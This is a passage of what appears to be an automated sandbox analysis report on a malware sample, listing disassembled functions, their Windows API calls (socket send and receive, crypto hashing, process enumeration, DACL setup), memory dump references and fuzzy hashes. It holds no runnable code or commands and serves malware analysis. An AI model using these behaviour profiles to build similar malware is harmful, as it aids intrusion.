                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3749125693-0
                                                                                                            • Opcode ID: b0d94c352cee23f0cb0c94c769e6ea0617c8c6e6ffff146fea96038293f0781c
                                                                                                            • Instruction ID: 1ac2420537a0ab336ba2c76fd3eff06f152716add111a674cbdf8643f6ee4296
                                                                                                            • Opcode Fuzzy Hash: b0d94c352cee23f0cb0c94c769e6ea0617c8c6e6ffff146fea96038293f0781c
                                                                                                            • Instruction Fuzzy Hash: 05613F74900209EFDB19DFA4D989BEEBBB9FF48304F108658E915A7394C7349985CF90
                                                                                                            Function 0031FE10 Relevance: 22.6, APIs: 15, Instructions: 144networkmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 0031FE45
                                                                                                            • und_memcpy.LIBCMTD ref: 0031FE6A
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031FE7A
                                                                                                            • WSAEventSelect.WS2_32(00000000,00000000,00000022), ref: 0031FEA9
                                                                                                            • WSAWaitForMultipleEvents.WS2_32(-00000001,00000000,00000000,000003E8,00000000), ref: 0031FECB
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FEF3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FEFD
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FF2A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FF34
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0031FF56
                                                                                                            • WSAGetLastError.WS2_32 ref: 0031FF88
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FFA8
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FFB2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031FFCA
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0031FFD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$CloseFreeHandle$Event$AllocCreateErrorEventsInfoLastLocaleMultipleSelectWait___crtund_memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1311366638-0
                                                                                                            • Opcode ID: 4548857062431b8ba19e1f438d3fbf66135ba1408fa652c14c20513a252ac211
                                                                                                            • Instruction ID: b9a81a54e4caef7a37736c7724858809c246f53c182a646b041a29931fcc752b
                                                                                                            • Opcode Fuzzy Hash: 4548857062431b8ba19e1f438d3fbf66135ba1408fa652c14c20513a252ac211
                                                                                                            • Instruction Fuzzy Hash: EA515EB4900209EFDB19DFA4D989BEEBBB9BF48304F108159F915A7290C774AA81CF51
                                                                                                            Function 0031BF00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 119encryptionsynchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,?,?,?,00309E2A,00000000), ref: 0031BF2D
                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031BF4D
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0031BFA4
                                                                                                            • CryptHashData.ADVAPI32(00000000,00309E2A,00002710,00000000), ref: 0031BFCA
                                                                                                            • CryptHashData.ADVAPI32(00000000,00309E2A,00000000,00000000), ref: 0031C000
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C04A
                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,00309E2A,00000000), ref: 0031C06A
                                                                                                            • CryptDestroyHash.ADVAPI32(00000000,?,?,?,00309E2A,00000000), ref: 0031C07A
                                                                                                            Strings
                                                                                                            • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0031BF22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Hash$Context$DataRelease$AcquireCreateDestroyObjectSingleWait
                                                                                                            • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                                                            • API String ID: 1452691613-63410773
                                                                                                            • Opcode ID: abd4e5cdb25c86779e842bf1c4966684eea7d6ff261950262d83b37a5c044a80
                                                                                                            • Instruction ID: f47bbc40a7400dd9dab6a823a21bb36ccde0c21170d7c9f8af1611e663f22be3
                                                                                                            • Opcode Fuzzy Hash: abd4e5cdb25c86779e842bf1c4966684eea7d6ff261950262d83b37a5c044a80
                                                                                                            • Instruction Fuzzy Hash: 0A412F74A40208EFDB29CF94CD89BEEB7B9FF4C704F209448E515A7280C7B59A85DB90
                                                                                                            Function 00320950 Relevance: 16.7, APIs: 11, Instructions: 247COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0032096D
                                                                                                              • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crtrecv
                                                                                                            • String ID:
                                                                                                            • API String ID: 818993241-0
                                                                                                            • Opcode ID: f92fbf7cd93221be849fa81a9886e25e0c2779cae464b3a3850bff39f1ae7dcd
                                                                                                            • Instruction ID: eedec617af5b0f39ad1dab8ddd9eb4b9ea16254740a6c9522586276f281cd111
                                                                                                            • Opcode Fuzzy Hash: f92fbf7cd93221be849fa81a9886e25e0c2779cae464b3a3850bff39f1ae7dcd
                                                                                                            • Instruction Fuzzy Hash: ACB12FB490022CDFDB19CF94E984BADB7B5FF44308F218219E8056B292C775E989DF41
                                                                                                            Function 00320CD0 Relevance: 16.7, APIs: 11, Instructions: 239COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00320CED
                                                                                                              • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale___crtsend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3464212537-0
                                                                                                            • Opcode ID: ef0014fdffca72edda7ce5bfa61d5177894ec2288260039f54043f7e1b7c5c22
                                                                                                            • Instruction ID: 4c4dfe4e9d6032d8b2a80309ff1fd8b7ee8739da1f0dd4de5317047aa0d0a74a
                                                                                                            • Opcode Fuzzy Hash: ef0014fdffca72edda7ce5bfa61d5177894ec2288260039f54043f7e1b7c5c22
                                                                                                            • Instruction Fuzzy Hash: 54B10B74900258DFDB29CF94E988BADBBB5FF48308F218109E906AB385C775AD85DF41
                                                                                                            Function 00320630 Relevance: 12.1, APIs: 8, Instructions: 124memorynetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,?,003204A6,?), ref: 00320672
                                                                                                            • htons.WS2_32(?), ref: 00320697
                                                                                                            • wsprintfA.USER32 ref: 003206C0
                                                                                                              • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
                                                                                                              • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
                                                                                                              • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                              • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 00320701
                                                                                                              • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
                                                                                                              • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
                                                                                                              • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
                                                                                                              • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
                                                                                                              • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0032073A
                                                                                                              • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
                                                                                                            • und_memcpy.LIBCMTD ref: 0032076A
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00320776
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00320784
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2352516679-0
                                                                                                            • Opcode ID: 9cc309aa705d93e4831d69b02dd51eadd85361c3feadaa8b04d474cefe7b1e16
                                                                                                            • Instruction ID: 8d7a0bdf1f536372df33ef03743c6a5027866980133acf08f0cbd601dcaa2bee
                                                                                                            • Opcode Fuzzy Hash: 9cc309aa705d93e4831d69b02dd51eadd85361c3feadaa8b04d474cefe7b1e16
                                                                                                            • Instruction Fuzzy Hash: 2A411EB5D00219AFCB09DF98D881ABFBBB5BF48300F148548E649AB342D635E945DFE4
                                                                                                            Function 003204F0 Relevance: 10.6, APIs: 7, Instructions: 113memorynetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32(00000040,000003F0,?,?,?,?,?,?,?,0032043F,?), ref: 00320532
                                                                                                            • htons.WS2_32(?), ref: 00320557
                                                                                                              • Part of subcall function 00320870: WSACreateEvent.WS2_32 ref: 00320876
                                                                                                              • Part of subcall function 00320870: WSAEventSelect.WS2_32(?,00000000,00000002), ref: 00320893
                                                                                                              • Part of subcall function 00320870: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003208D3
                                                                                                              • Part of subcall function 00320870: WSACloseEvent.WS2_32(00000000), ref: 003208E0
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 0032059D
                                                                                                              • Part of subcall function 0031F670: send.WS2_32(00000000,?,000000FF,00320E0C), ref: 0031F683
                                                                                                              • Part of subcall function 00320790: WSACreateEvent.WS2_32 ref: 00320796
                                                                                                              • Part of subcall function 00320790: WSAEventSelect.WS2_32(?,00000000,00000001), ref: 003207B3
                                                                                                              • Part of subcall function 00320790: WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000001,00000000), ref: 003207F3
                                                                                                              • Part of subcall function 00320790: WSACloseEvent.WS2_32(00000000), ref: 00320800
                                                                                                            • ___crtGetLocaleInfoEx.LIBCMTD ref: 003205D6
                                                                                                              • Part of subcall function 0031F650: recv.WS2_32(00000000,?,000000FF,00320A9A), ref: 0031F663
                                                                                                            • und_memcpy.LIBCMTD ref: 00320606
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00320612
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00320620
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$Local$CloseCreateEventsFreeInfoLocaleMultipleSelectWait___crt$Allochtonsrecvsendund_memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3977134054-0
                                                                                                            • Opcode ID: 853c822f9fc150714fdc786384cb342bf02209ea00948efa7406b0154f1f0b29
                                                                                                            • Instruction ID: 945d8f74f9cadc98b2742d955ba8920af2386c81e897e9dcbba79c8c4806f4ce
                                                                                                            • Opcode Fuzzy Hash: 853c822f9fc150714fdc786384cb342bf02209ea00948efa7406b0154f1f0b29
                                                                                                            • Instruction Fuzzy Hash: 574143B4D00219AFCB09DF94D981ABFB7B5FF98300F148549F544AB342D635EA41CBA1
                                                                                                            Function 00310400 Relevance: 10.6, APIs: 7, Instructions: 81memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0031044D
                                                                                                            • _memset.LIBCMT ref: 00310463
                                                                                                            • SetEntriesInAclW.ADVAPI32(00000001,FFFFFFFF,00000000,00000000), ref: 003104A0
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000014), ref: 003104B3
                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 003104C8
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 003104DE
                                                                                                            • LocalFree.KERNEL32(00000000), ref: 003104F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DescriptorInitializeLocalSecurity$AllocAllocateDaclEntriesFree_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4046344516-0
                                                                                                            • Opcode ID: bdcd633d7d164ff05a2de92dacd53163600c75d3023c8c375fd46c787a6ff625
                                                                                                            • Instruction ID: 773621aa11414684eee5b61a5831144c7139733af80eca88a689a8a05cc694fb
                                                                                                            • Opcode Fuzzy Hash: bdcd633d7d164ff05a2de92dacd53163600c75d3023c8c375fd46c787a6ff625
                                                                                                            • Instruction Fuzzy Hash: 9431F070D40209EFEB15DFE5D889BEEBBB8AF08704F104558E604BA2C1D7B95684CBA1
                                                                                                            Function 00304410 Relevance: 9.1, APIs: 6, Instructions: 55processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00304424
                                                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0030444C
                                                                                                            • StrCmpIW.SHLWAPI(?,-00374CE4), ref: 00304496
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 003044A4
                                                                                                            • Process32NextW.KERNEL32(000000FF,0000022C), ref: 003044BE
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 003044CC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 1789362936-0
                                                                                                            • Opcode ID: 28bb333e4eb869148e28682037ce3e74f2246932e9c6f52f27c0bb0620899992
                                                                                                            • Instruction ID: 36f94aec318b938d8fa28ca72be6915c17758306fdca31097854d468ad21da95
                                                                                                            • Opcode Fuzzy Hash: 28bb333e4eb869148e28682037ce3e74f2246932e9c6f52f27c0bb0620899992
                                                                                                            • Instruction Fuzzy Hash: 5E1151B0902218EBCB35DFA5DD5CB9D77B8BB04300F204698E609A72D0D7389B81DF50
                                                                                                            Function 003044E0 Relevance: 9.1, APIs: 6, Instructions: 55processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003044F4
                                                                                                            • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 0030451C
                                                                                                            • StrCmpIW.SHLWAPI(?,-003758D8), ref: 00304566
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 00304574
                                                                                                            • Process32NextW.KERNEL32(000000FF,0000022C), ref: 0030458E
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0030459C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 1789362936-0
                                                                                                            • Opcode ID: be560d6e52a33434e1e6e1b34572649a023a09399fd113f4eb627290a2f4d97d
                                                                                                            • Instruction ID: ffcde23c0d09d70744fbba1c39e7f18088737538a18829b48a3476bea1732a99
                                                                                                            • Opcode Fuzzy Hash: be560d6e52a33434e1e6e1b34572649a023a09399fd113f4eb627290a2f4d97d
                                                                                                            • Instruction Fuzzy Hash: CD114FB1912218DBCB25DBA4DD5CB99B77CAF45300F204698A50AA7290D7349B81DF40
                                                                                                            Function 0031CA00 Relevance: 9.0, APIs: 6, Instructions: 41processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0031CA09
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0031CA16
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0031CA3A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031CA53
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0031CA6C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0031CA7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
